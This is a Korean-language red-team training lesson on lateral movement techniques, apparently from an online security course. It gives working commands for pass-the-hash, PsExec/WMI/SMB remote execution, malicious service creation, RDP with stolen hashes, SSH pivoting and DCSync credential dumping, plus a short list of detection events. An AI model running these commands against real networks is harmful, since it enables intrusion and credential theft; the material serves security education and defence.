0Pricing
Cyber Security Academy · 강의

측면 이동 기법

WMI, PsExec, WinRM 및 SMB 공유를 사용해 경보를 발생시키지 않고 네트워크 내부를 이동합니다.

측면 이동 기법은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 3번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

측면 이동이란 무엇인가요

측면 이동은 최초 침해 이후 공격자가 네트워크를 점진적으로 이동하는 데 사용하는 기법의 집합입니다. 첫 거점에서 도메인 컨트롤러, 데이터베이스, 백업 시스템과 같은 더 중요한 대상으로 이동하는 방식입니다.

해시 전달(PtH)

Windows NTLM 인증에서는 평문 암호 대신 암호 해시를 직접 사용할 수 있습니다. NTLM 해시를 덤프한 공격자는 해시를 해독하지 않고도 다른 시스템에 인증할 수 있습니다.

# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5

# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH

티켓 전달(PtT)

Kerberos 티켓(TGT 또는 TGS)은 메모리에서 추출하여 티켓 소유자로 인증하는 데 사용할 수 있습니다. 골든 티켓 공격은 KRBTGT 해시를 사용하여 TGT를 위조하므로 도메인에 무제한으로 Kerberos 액세스할 수 있습니다.

원격 코드 실행: PSExec

psexec(Sysinternals 및 Impacket)는 SMB/관리자 공유를 통해 원격 Windows 호스트에서 명령을 실행합니다. 관리자 자격 증명이 필요하며 대상에 서비스 바이너리를 생성합니다.

impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexec

WMI를 이용한 측면 이동

Windows Management Instrumentation을 사용하면 여러 도구에서 탐지할 수 있는 파일을 생성하지 않고 원격 코드 실행을 수행할 수 있습니다:

# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")

SMB 및 관리자 공유

Windows 관리자 공유(C$, ADMIN$, IPC$)를 사용하면 관리자 자격 증명으로 측면 이동을 수행할 수 있습니다:

# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5

원격 서비스: sc 및 at

원격 시스템에서 서비스 또는 예약 작업 생성:

# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc

# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"

RDP 및 대화형 세션

RDP(원격 데스크톱 프로토콜, 포트 3389)는 완전한 대화형 액세스를 제공합니다. 공격자는 탈취한 자격 증명으로 RDP를 사용합니다. 방어 방법: RDP를 점프 서버로 제한하고, NLA를 요구하며, 모든 세션을 기록합니다.

# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5

측면 이동 수단으로서의 SSH

Linux 환경에서는 탈취한 키나 자격 증명을 사용하는 SSH로 측면 이동을 수행합니다. 에이전트 전달 악용을 통해 침해된 호스트를 거쳐 이동할 수 있습니다. SSH 터널은 포트를 전달하여 원래는 접근할 수 없는 시스템에 도달하게 합니다.

# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_host

Active Directory 복제(DCSync)

DCSync는 AD 복제를 악용하여 DC에서 직접 암호 해시를 가져오며, DC에서 코드를 실행할 필요가 없습니다. DS-Replication-Get-Changes-All 권한이 필요합니다:

# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgt

측면 이동 탐지

탐지 지표:

  • 비정상적인 Type 3(네트워크) 로그온이 포함된 이벤트 4624
  • 원격 호스트에서의 서비스 생성(Event 7045)
  • 워크스테이션 간 SMB 연결
  • 원격 호스트에서의 WMI 프로세스 생성
  • 비정상적인 계정 동작(사용자가 여러 컴퓨터에서 로그인)

빠른 확인: 측면 이동

어떤 기법을 사용하면 공격자가 해시를 해독하지 않고 캡처한 NTLM 해시로 Windows 시스템에 인증할 수 있나요?

학습 내용 요약

측면 이동은 침해된 자격 증명과 프로토콜을 사용하여 네트워크 전체로 확산됩니다. 주요 기법으로는 해시 전달(NTLM 해시 재사용), 티켓 전달(Kerberos), 원격 실행을 위한 PSExec/WMI/SMB, 도메인 자격 증명 수집을 위한 DCSync가 있습니다. 탐지 방법으로는 비정상적인 네트워크 로그온(이벤트 4624), 원격 서비스 생성(이벤트 7045), 워크스테이션 간 SMB 트래픽이 있습니다.

자주 묻는 질문

“측면 이동 기법” 강의는 무료인가요?

네 — “측면 이동 기법” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

“측면 이동 기법”에서 뭘 배우나요?

WMI, PsExec, WinRM 및 SMB 공유를 사용해 경보를 발생시키지 않고 네트워크 내부를 이동합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.

Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?

사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 3번째 강의입니다.

“측면 이동 기법” 강의는 얼마나 걸리나요?

대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.

이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?

네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.

이 강의의 모든 강의

  1. C2 프레임워크: Cobalt Strike와 Sliver
  2. Living-Off-the-Land 바이너리(LOLBins)
  3. 측면 이동 기법
  4. 레드 팀 보고서 작성
← Cyber Security Academy(으)로 돌아가기